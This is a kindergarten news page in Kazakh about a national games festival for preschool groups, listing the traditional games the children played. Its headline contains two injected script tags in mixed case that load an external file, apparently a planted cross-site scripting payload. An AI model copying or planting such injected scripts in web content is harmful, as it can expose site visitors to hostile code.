"Біртұтас тәрбие" бағдарламасын жүзеге асыруда "Ұлттық тәрбие-рухани қазына" жоба жұмысы "Ұлттық ойындар" фестивалі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

04.07.2024

"Ақбота" бөбекжайында "Алақай, жаз келді" жазғы сауықтыру жұмыс жоспары және "Біртұтас тәрбие" бағдарламасын жүзеге асыруда "Ұлттық тәрбие-рухани қазына" жоба жұмысы бойынша ересек "Еркетай" , "Балдырған" топтарының арасында музыка жетекшілері Шайкенова Ә. С , Бейсенова Д.Қ ұйымдастыруымен  "Ұлттық ойындар" фестивалі     өткізілді. Фестивальді өткізу мақсатымыз балаларға ұлттық ойындарды ойната отыра адамгершілік, адалдық, әділдік қасиетін қалыптастырып, өз ұлтына деген сүйіспеншілігін арттырып, салт -дәстүрлерді сақтай білуге ынталандыру. Ересек "Еркетай" тобы "Арқан тарту" , " Аударыспақ" , "Тақия тастамақ" ойындарын ойнаса, ал "Балдырған" тобы "Ақ серек, Көк серек" , " Сақина салу" , "Күш сынаспақ", "Асық ату" ойындарын ойнады. Балаларға ойынның шарты мен мақсаты түсіндірілді. Әр топ ұсынылған ойындарға қызығушылық танытып, қуана қатысып шықты. 

Просмотров: 295


Пікір қосу



Деректерді қолтаңбаға қосу